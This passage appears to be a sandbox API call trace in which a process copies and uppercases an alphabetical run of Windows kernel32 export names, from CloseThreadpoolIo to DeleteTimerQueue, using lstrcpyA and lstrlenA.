[0077.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0077.413] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0077.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0077.413] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0077.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0077.413] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0077.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0077.413] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0077.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0077.413] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0077.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0077.413] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0077.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0077.413] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0077.413] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0077.414] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0077.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0077.414] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0077.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0077.414] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0077.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0077.414] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0077.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0077.414] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0077.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0077.414] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0077.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0077.414] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0077.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0077.414] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0077.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0077.414] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0077.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0077.414] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0077.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0077.414] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0077.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0077.414] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0077.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0077.414] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0077.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0077.414] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0077.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0077.414] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0077.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0077.414] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0077.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0077.414] lstrlenA (lpString="COPYCONTEXT") returned 11 [0077.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0077.414] lstrlenA (lpString="COPYFILEA") returned 9 [0077.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0077.414] lstrlenA (lpString="COPYFILEEXA") returned 11 [0077.414] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0077.415] lstrlenA (lpString="COPYFILEEXW") returned 11 [0077.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0077.415] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0077.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0077.415] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0077.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0077.415] lstrlenA (lpString="COPYFILEW") returned 9 [0077.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0077.415] lstrlenA (lpString="COPYLZFILE") returned 10 [0077.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0077.415] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0077.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0077.415] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0077.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0077.415] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0077.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0077.415] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0077.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0077.415] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0077.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0077.415] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0077.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0077.415] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0077.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0077.415] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0077.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0077.415] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0077.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0077.415] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0077.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0077.415] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0077.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0077.415] lstrlenA (lpString="CREATEEVENTA") returned 12 [0077.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0077.415] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0077.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0077.415] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0077.415] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0077.415] lstrlenA (lpString="CREATEEVENTW") returned 12 [0077.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0077.416] lstrlenA (lpString="CREATEFIBER") returned 11 [0077.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0077.416] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0077.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0077.416] lstrlenA (lpString="CREATEFILEA") returned 11 [0077.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0077.416] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0077.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0077.416] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0077.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0077.416] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0077.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0077.416] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0077.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0077.416] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0077.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0077.416] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0077.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0077.416] lstrlenA (lpString="CREATEFILEW") returned 11 [0077.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0077.416] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0077.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0077.416] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0077.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0077.416] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0077.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0077.416] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0077.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0077.416] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0077.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0077.416] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0077.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0077.416] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0077.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0077.416] lstrlenA (lpString="CREATEJOBSET") returned 12 [0077.416] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0077.417] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0077.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0077.417] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0077.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0077.417] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0077.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0077.417] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0077.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0077.417] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0077.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0077.417] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0077.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0077.417] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0077.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0077.417] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0077.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0077.417] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0077.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0077.417] lstrlenA (lpString="CREATEPIPE") returned 10 [0077.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0077.417] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0077.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0077.417] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0077.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0077.417] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0077.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0077.417] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0077.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0077.417] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0077.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0077.417] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0077.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0077.417] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0077.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0077.417] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0077.417] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0077.417] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0077.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0077.418] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0077.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0077.418] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0077.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0077.418] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0077.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0077.418] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0077.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0077.418] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0077.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0077.418] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0077.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0077.418] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0077.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0077.418] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0077.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0077.418] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0077.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0077.418] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0077.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0077.418] lstrlenA (lpString="CREATETHREAD") returned 12 [0077.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0077.418] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0077.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0077.418] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0077.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0077.418] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0077.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0077.418] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0077.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0077.418] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0077.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0077.418] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0077.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0077.418] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0077.418] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0077.418] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0077.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0077.419] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0077.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0077.419] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0077.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0077.419] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0077.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0077.419] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0077.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0077.419] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0077.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0077.419] lstrlenA (lpString="CTRLROUTINE") returned 11 [0077.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0077.419] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0077.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0077.419] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0077.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0077.419] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0077.419] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0077.419] lstrlenA (lpString="DEBUGBREAK") returned 10 [0077.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0077.420] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0077.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0077.420] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0077.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0077.420] lstrlenA (lpString="DECODEPOINTER") returned 13 [0077.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0077.420] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0077.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0077.420] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0077.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0077.420] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0077.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0077.420] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0077.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0077.420] lstrlenA (lpString="DELETEATOM") returned 10 [0077.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0077.420] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0077.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0077.420] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0077.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0077.420] lstrlenA (lpString="DELETEFIBER") returned 11 [0077.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0077.420] lstrlenA (lpString="DELETEFILEA") returned 11 [0077.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0077.420] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0077.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0077.420] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0077.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0077.420] lstrlenA (lpString="DELETEFILEW") returned 11 [0077.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0077.420] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0077.420] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") 